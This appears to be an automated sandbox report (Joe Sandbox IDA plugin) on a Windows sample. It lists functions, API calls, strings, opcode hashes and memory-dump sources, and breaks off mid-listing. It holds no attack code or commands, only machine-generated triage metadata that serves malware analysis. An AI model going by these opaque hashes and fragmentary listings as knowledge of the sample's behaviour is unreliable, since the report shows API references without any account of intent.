                                                                                                                                                                          • Opcode ID: fb3a1052521ae5f7cbef87c85c813532a2a13f7da55ff6a9d56e87e02ef5b78c
                                                                                                                                                                          • Instruction ID: ff9bdfba4f95e0afe2422b816dba737cd977533716a8baaab30c8b48ee00e0b2
                                                                                                                                                                          • Opcode Fuzzy Hash: fb3a1052521ae5f7cbef87c85c813532a2a13f7da55ff6a9d56e87e02ef5b78c
                                                                                                                                                                          • Instruction Fuzzy Hash: 43317EB1A00218AFDB21DF99D88599EBBF8EF95310F1040EAF90497311DB718B44EB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B431FB
                                                                                                                                                                          • _abort.LIBCMT ref: 00B43306
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EncodePointer_abort
                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                          • API String ID: 948111806-2084237596
                                                                                                                                                                          • Opcode ID: 97ce813cb44287ae16ed1f9679eb826be0ef4bbd0e4be1e96febce52be43fbee
                                                                                                                                                                          • Instruction ID: 24c90b4f856b4ac2ac42f247f924603f4ce8e6a0429966af6779eb12bcdff9a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 97ce813cb44287ae16ed1f9679eb826be0ef4bbd0e4be1e96febce52be43fbee
                                                                                                                                                                          • Instruction Fuzzy Hash: DB415871900209AFCF15DF98CD82AAEBBF5FF48704F188099F904A7212D375AB50EB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B27406
                                                                                                                                                                            • Part of subcall function 00B23BBA: __EH_prolog.LIBCMT ref: 00B23BBF
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B274CD
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B27AAB
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetLastError.KERNEL32 ref: 00B27AF1
                                                                                                                                                                            • Part of subcall function 00B27A9C: CloseHandle.KERNEL32(?), ref: 00B27B00
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                          • API String ID: 3813983858-639343689
                                                                                                                                                                          • Opcode ID: 96704eafc6c81cded3feb43147d1b6168375a34aa23b2248bcdcc6fd6dadb71a
                                                                                                                                                                          • Instruction ID: 0882871bd9b382132ba8203ea2b1df627ca69e110d6115f9c393d013a2686b6f
                                                                                                                                                                          • Opcode Fuzzy Hash: 96704eafc6c81cded3feb43147d1b6168375a34aa23b2248bcdcc6fd6dadb71a
                                                                                                                                                                          • Instruction Fuzzy Hash: 4631E171D44268AADF11EBA8AC45BEEBBF8EF19700F0440D5F808A7292DF748A44C764
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3AD98
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B3ADAD
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B3ADC2
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                                                          • String ID: ASKNEXTVOL
                                                                                                                                                                          • API String ID: 445417207-3402441367
                                                                                                                                                                          • Opcode ID: b3d3926ff646ec0757e8311bb0a6003d966d096be4bf57035bcffe82413f551a
                                                                                                                                                                          • Instruction ID: c971ef1c6128ddd823422d483f2c02fa80c1b516d1b2f59e93ce8b8018b31fe5
                                                                                                                                                                          • Opcode Fuzzy Hash: b3d3926ff646ec0757e8311bb0a6003d966d096be4bf57035bcffe82413f551a
                                                                                                                                                                          • Instruction Fuzzy Hash: 57118432241210BFD6119F6DAC45F6A77EDEB4AB42F3004A0F281EB5B0CB619945DB26
                                                                                                                                                                          APIs
                                                                                                                                                                          • __fprintf_l.LIBCMT ref: 00B2D954
                                                                                                                                                                          • _strncpy.LIBCMT ref: 00B2D99A
                                                                                                                                                                            • Part of subcall function 00B31DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00B61030,00000200,00B2D928,00000000,?,00000050,00B61030), ref: 00B31DC4
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                          • String ID: $%s$@%s
                                                                                                                                                                          • API String ID: 562999700-834177443
                                                                                                                                                                          • Opcode ID: cf568a9413aa5072ad0cab2465eae954ed6f2ab1b6689df9ed14c537c1cba7f8
                                                                                                                                                                          • Instruction ID: 41a3752519c7674e738b426551414de84a1489c66978b8a7211823b855c92965
                                                                                                                                                                          • Opcode Fuzzy Hash: cf568a9413aa5072ad0cab2465eae954ed6f2ab1b6689df9ed14c537c1cba7f8
                                                                                                                                                                          • Instruction Fuzzy Hash: F521A232440258AEDB21EFA4DC45FDE7BECEF05700F1404A2F918962A2E372D688DB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B2AC5A,00000008,?,00000000,?,00B2D22D,?,00000000), ref: 00B30E85
                                                                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B2AC5A,00000008,?,00000000,?,00B2D22D,?,00000000), ref: 00B30E8F
                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B2AC5A,00000008,?,00000000,?,00B2D22D,?,00000000), ref: 00B30E9F
                                                                                                                                                                          Strings
                                                                                                                                                                          • Thread pool initialization failed., xrefs: 00B30EB7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                          • String ID: Thread pool initialization failed.
                                                                                                                                                                          • API String ID: 3340455307-2182114853
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3B2BE
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B3B2D6
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B3B304
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                                                          • String ID: GETPASSWORD1
                                                                                                                                                                          • API String ID: 445417207-3292211884
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                          • API String ID: 0-56093855
                                                                                                                                                                          APIs
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00B27F69,?,?,?), ref: 00B2A3FA
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00B27F69,?), ref: 00B2A43E
                                                                                                                                                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00B27F69,?,?,?,?,?,?,?), ref: 00B2A4BF
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,00B27F69,?,?,?,?,?,?,?,?,?,?), ref: 00B2A4C6
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Create$CloseHandleTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2287278272-0
                                                                                                                                                                          APIs
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00B491E0,?,00000000,?,00000001,?,?,00000001,00B491E0,?), ref: 00B4C9D5
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B4CA5E
                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B46CBE,?), ref: 00B4CA70
                                                                                                                                                                          • __freea.LIBCMT ref: 00B4CA79
                                                                                                                                                                            • Part of subcall function 00B48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                          • Opcode ID: 12e22158318f6187d46eeba8f7ca6df0c0a102f4617e198a529d12955f5b4cfd
                                                                                                                                                                          • Instruction ID: e83ae283b2dfa53e8e4d7fb9dd4de2c153a66e6d78d1cafeed3f4c689cb94429
                                                                                                                                                                          • Opcode Fuzzy Hash: 12e22158318f6187d46eeba8f7ca6df0c0a102f4617e198a529d12955f5b4cfd
                                                                                                                                                                          • Instruction Fuzzy Hash: 2231A072A0221AABDF25DF64CC41EAE7BE5EB01B50F1441A8FC04E7254EB35CE50DB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00B3A666
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B3A675
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B3A683
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00B3A691
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                          • Opcode ID: 2a6298413276d18e5e05702dd3fef037f3d254bd75601f1d3c73299f9705674a
                                                                                                                                                                          • Instruction ID: 4849ba8f4d4108f00c5df60f4210346e6a796f8cc036e2637abb78d3270c0ea6
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6298413276d18e5e05702dd3fef037f3d254bd75601f1d3c73299f9705674a
                                                                                                                                                                          • Instruction Fuzzy Hash: F5E01231942721B7D3615B61BC0EF8B3E94EB05F52F010201FA05AB2F0DFB98600CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B3A699: GetDC.USER32(00000000), ref: 00B3A69D
                                                                                                                                                                            • Part of subcall function 00B3A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B3A6A8
                                                                                                                                                                            • Part of subcall function 00B3A699: ReleaseDC.USER32(00000000,00000000), ref: 00B3A6B3
                                                                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00B3A83C
                                                                                                                                                                            • Part of subcall function 00B3AAC9: GetDC.USER32(00000000), ref: 00B3AAD2
                                                                                                                                                                            • Part of subcall function 00B3AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00B3AB01
                                                                                                                                                                            • Part of subcall function 00B3AAC9: ReleaseDC.USER32(00000000,?), ref: 00B3AB99
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                          • String ID: (
                                                                                                                                                                          • API String ID: 1061551593-3887548279
                                                                                                                                                                          • Opcode ID: 26f687a4fa60b9ce5c1dbe5971fb8b4eaae1c085a5be5a16e60d014deb7d1058
                                                                                                                                                                          • Instruction ID: 9204c4350efda6f8c40deecf59557973412c81c8aa60f619cd47df39554c61b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 26f687a4fa60b9ce5c1dbe5971fb8b4eaae1c085a5be5a16e60d014deb7d1058
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C91F371204740AFD610DF25C884A2BBBE8FFC8B01F10499EF59AD3260DB71A905CF62
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B275E3
                                                                                                                                                                            • Part of subcall function 00B305DA: _wcslen.LIBCMT ref: 00B305E0
                                                                                                                                                                            • Part of subcall function 00B2A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B2A598
                                                                                                                                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B2777F
                                                                                                                                                                            • Part of subcall function 00B2A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A501
                                                                                                                                                                            • Part of subcall function 00B2A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A532
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                                                          • String ID: :
                                                                                                                                                                          • API String ID: 3226429890-336475711
                                                                                                                                                                          • Opcode ID: 76eae5780390d9a52f8fbdd2f7906e23d4304e91628427c250b46120f604e327
                                                                                                                                                                          • Instruction ID: 810671894a0cdc75f5c07b5a343092af58201379a97cc5b878569c5ce6b91e86
                                                                                                                                                                          • Opcode Fuzzy Hash: 76eae5780390d9a52f8fbdd2f7906e23d4304e91628427c250b46120f604e327
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E418371901268AAEB21EB64EC95EDEB3FDEF55300F0040D6B60DA2092DB745F89CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: }
                                                                                                                                                                          • API String ID: 176396367-4239843852
                                                                                                                                                                          • Opcode ID: adcbf74177d16d64d60bb897ff9a2a26b858112ba3e608d6edae8ba47dc9c606
                                                                                                                                                                          • Instruction ID: 77e7ee0ab0cb94eda831a0492a3011a0f66d65c1a109f7f036f3181839f04540
                                                                                                                                                                          • Opcode Fuzzy Hash: adcbf74177d16d64d60bb897ff9a2a26b858112ba3e608d6edae8ba47dc9c606
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A2135329053065ADB30EA64D851F6FB3DCDFA0710F2504AAF780C3245EB64DE4893B2
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B2F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B2F2E4
                                                                                                                                                                            • Part of subcall function 00B2F2C5: GetProcAddress.KERNEL32(00B681C8,CryptUnprotectMemory), ref: 00B2F2F4
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00B2F33E), ref: 00B2F3D2
                                                                                                                                                                          Strings
                                                                                                                                                                          • CryptProtectMemory failed, xrefs: 00B2F389
                                                                                                                                                                          • CryptUnprotectMemory failed, xrefs: 00B2F3CA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                                                                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                          • API String ID: 2190909847-396321323
                                                                                                                                                                          • Opcode ID: 5ab7e146112e687457e063e073ca6d502d765f317bbd0f0230a5a5277b8572f1
                                                                                                                                                                          • Instruction ID: ec4114e4117f997937a558c040c6d18541c67a17dd17b1e379e28338a3e711ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab7e146112e687457e063e073ca6d502d765f317bbd0f0230a5a5277b8572f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 2711E43260163AABDF11AB20E84167E37E5FF05B60B0442F5FC096B391DE749D018A99
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B2B9B8
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __vswprintf_c_l_swprintf
                                                                                                                                                                          • String ID: %c:\
                                                                                                                                                                          • API String ID: 1543624204-3142399695
                                                                                                                                                                          • Opcode ID: 546d45b6c931d9e6a8e313d20f34818e0f42f6aa000336197b18058445d762f9
                                                                                                                                                                          • Instruction ID: 9e51fbd1ed43e7781e3101d806198aca777c31b23ccfbefdac551abf546e336f
                                                                                                                                                                          • Opcode Fuzzy Hash: 546d45b6c931d9e6a8e313d20f34818e0f42f6aa000336197b18058445d762f9
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F01456310032169DA306B75AC86D2BB3ECEE86770B40448AF548D6182FF20E94082B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00010000,00B31160,?,00000000,00000000), ref: 00B31043
                                                                                                                                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 00B3108A
                                                                                                                                                                            • Part of subcall function 00B26C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B26C54
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                          • String ID: CreateThread failed
                                                                                                                                                                          • API String ID: 2655393344-3849766595
                                                                                                                                                                          • Opcode ID: 1a1089240d488fef4408607416c6a19ff7a7013fa1be822e282051ab7797ffc6
                                                                                                                                                                          • Instruction ID: 288d54aec3c9505757fc4843d242cca094b164a397cd01ba0878527fe0d3d5ee
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a1089240d488fef4408607416c6a19ff7a7013fa1be822e282051ab7797ffc6
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D01F9B63443096FD7346F6CAC51B76B3DCEB40751F3408EEFA86922D0CEA168858624
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B2E2E8: _swprintf.LIBCMT ref: 00B2E30E
                                                                                                                                                                            • Part of subcall function 00B2E2E8: _strlen.LIBCMT ref: 00B2E32F
                                                                                                                                                                            • Part of subcall function 00B2E2E8: SetDlgItemTextW.USER32(?,00B5E274,?), ref: 00B2E38F
                                                                                                                                                                            • Part of subcall function 00B2E2E8: GetWindowRect.USER32(?,?), ref: 00B2E3C9
                                                                                                                                                                            • Part of subcall function 00B2E2E8: GetClientRect.USER32(?,?), ref: 00B2E3D5
                                                                                                                                                                          • GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 2622349952-4108050209
                                                                                                                                                                          • Opcode ID: 99dbc748ed0ce2ce2ad3e4ba75fbcd73ace5b85fe3063afc91576b9788c27b19
                                                                                                                                                                          • Instruction ID: 5ac5b55c8b3ac551d80eb67dad1659370649a920602e2d91356c1943f2f3b9d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 99dbc748ed0ce2ce2ad3e4ba75fbcd73ace5b85fe3063afc91576b9788c27b19
                                                                                                                                                                          • Instruction Fuzzy Hash: 42F081311042A8B6DF155F58E80D7A93BDBEB20B44F094D94FC49515A1DB78C990DB14
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00B31206,?), ref: 00B30FEA
                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 00B30FF6
                                                                                                                                                                            • Part of subcall function 00B26C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B26C54
                                                                                                                                                                          Strings
